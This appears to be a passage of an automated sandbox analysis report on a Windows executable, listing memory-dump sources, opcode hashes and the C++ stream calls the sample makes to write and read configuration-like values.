                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 512c292fdddac8fadd8bee25fcce6216da02647fedf7223a0dbb6b8c96daeb65
                                                                                                                                                                                                              • Instruction ID: c75dc5be8975c3e353ddd26516b5fe4442507a95017cc8a681753ec2ad33bc74
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 512c292fdddac8fadd8bee25fcce6216da02647fedf7223a0dbb6b8c96daeb65
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D5107A6A384B197DE50DF2AD8C16BC7792E74AB43FD48476D65882F91C12DC10AEF30
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 08bc665d7d74957357dfb2865b53844b73cc3dd795c035b4743b64fb389cc0bd
                                                                                                                                                                                                              • Instruction ID: 77045e3551cf2156485f06e3a29473588495a2ef7a1df62027330f0877c980f6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08bc665d7d74957357dfb2865b53844b73cc3dd795c035b4743b64fb389cc0bd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F241DB31E1D3AA95E521A5A351C0179A352AF6AF80FACC732ED8C27AC4DB38E4816640
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: d406a45ebeab2dfcb8c903a12aa031135c655f79b932f30f18ed0330c4a30bac
                                                                                                                                                                                                              • Instruction ID: a60cf084d34e7c93b0f4cdce147f37945b46706101c817f8fff227ceed82787c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d406a45ebeab2dfcb8c903a12aa031135c655f79b932f30f18ed0330c4a30bac
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4741B433B2154187E78CCE3AC8566AD33A2F398300F85C23DDA0AC3385DA399905DB44
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 03476e7227802f569826f36016054d3e6064328171a835016549a9e5441fdc82
                                                                                                                                                                                                              • Instruction ID: b19375246925e469fa629d3b0c4fcd4bdcdb80e8c7216e02bfa3e0d3ec1eb9ff
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 03476e7227802f569826f36016054d3e6064328171a835016549a9e5441fdc82
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93314737738A5757EB4C8639E932B796AD1F345700FC9A539EE4AC6AC2DB2DD4208310

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1416 7ff735dd3420-7ff735dd388a memset call 7ff735de74f0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff735de7c30 1421 7ff735dd38ac-7ff735dd390f call 7ff735de7480 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff735dea920 1416->1421 1422 7ff735dd388c-7ff735dd38ab ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z 1416->1422 1422->1421
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.VCRUNTIME140 ref: 00007FF735DD3450
                                                                                                                                                                                                                • Part of subcall function 00007FF735DE74F0: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF735DE752B
                                                                                                                                                                                                                • Part of subcall function 00007FF735DE74F0: ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF735DE754A
                                                                                                                                                                                                                • Part of subcall function 00007FF735DE74F0: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF735DE757C
                                                                                                                                                                                                                • Part of subcall function 00007FF735DE74F0: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF735DE7597
                                                                                                                                                                                                                • Part of subcall function 00007FF735DE74F0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF735DE75E3
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD346F
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD347F
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD3491
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD34A1
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD34B3
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD34C3
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD34D5
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD34E5
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF735DD34F6
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD3506
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF735DD3517
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD3527
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF735DD3538
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD3548
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD355A
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD356A
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF735DD357B
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD358B
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD359D
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD35AD
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF735DD35BE
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD35CE
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD35E0
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD35F0
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD3602
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD3612
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD3624
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD3634
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD3646
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD3656
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD3668
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD3678
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD368A
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD369A
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD36AC
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD36BC
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD36CE
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD36DE
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD36F0
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD3700
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD3712
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD3722
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD3734
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD3744
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD3756
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD3766
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z.MSVCP140 ref: 00007FF735DD3779
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD3789
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z.MSVCP140 ref: 00007FF735DD379C
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD37AC
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD37BE
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD37CE
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD37E0
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD37F0
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD3802
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD3812
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD3824
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD3834
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF735DD3845
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD3855
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF735DD3867
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD3877
                                                                                                                                                                                                                • Part of subcall function 00007FF735DE7C30: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF735DE74DA,?,?,?,00007FF735DE7984), ref: 00007FF735DE7C90
                                                                                                                                                                                                                • Part of subcall function 00007FF735DE7C30: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF735DE74DA,?,?,?,00007FF735DE7984), ref: 00007FF735DE7CB2
                                                                                                                                                                                                              • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF735DD38A5
                                                                                                                                                                                                              • ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF735DD38E3
                                                                                                                                                                                                              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF735DD38ED
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: U?$char_traits@$D@std@@@std@@$V01@$??6?$basic_ostream@$V01@@$V01@_$?setstate@?$basic_ios@Init@?$basic_streambuf@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_ostream@D@std@@@1@_V?$basic_streambuf@fclosememset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 764698701-0
                                                                                                                                                                                                              • Opcode ID: 084ce96f1bf528e2a3376c7f43c8d4a376ff7156af5c2bff50f80521cd475cfb
                                                                                                                                                                                                              • Instruction ID: 5608ce5888bc9a85cd03def6a796f6a2ba99d255a7b441fe2f8f9f34757dc85b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 084ce96f1bf528e2a3376c7f43c8d4a376ff7156af5c2bff50f80521cd475cfb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71E1D720A3DA87A2EE48EB21F894479B761FF81F46FC45431E44E06668DE3CE54DE760

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.VCRUNTIME140 ref: 00007FF735DD39B0
                                                                                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3A00
                                                                                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3A12
